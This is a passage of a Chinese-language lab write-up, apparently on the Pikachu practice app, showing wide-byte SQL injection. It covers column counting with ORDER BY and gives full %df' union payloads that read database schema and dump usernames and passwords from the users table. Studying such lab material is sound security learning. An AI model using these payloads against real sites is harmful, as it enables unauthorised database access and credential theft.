删去27,那是前端对‘%’进行url编码得来的;
还是不行,因为0 and 0当然就假了,
想起来要用or了:正常回显欧了,接下来和联合注入一样了
ORDER BY
查看左边列数多少
1🆗
2🆗
3不🆗
两位确定,
注库名
pikchua
注表名
注(user)表里的字段
kobe%df' or 1=1 union all select (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=(select table_name from information_schema.tables where table_schema=database() limit 3,1)),1#
注值
kobe%df' or 1=1 union all select 1,(select group_concat(username,password) from users)#
总结:
只要网站的开发人员,使用到的转义函数添加的过滤字符经过url编码以后,能够被转化成2位16进制的编码,就可以利用宽字节注入实现一个攻击;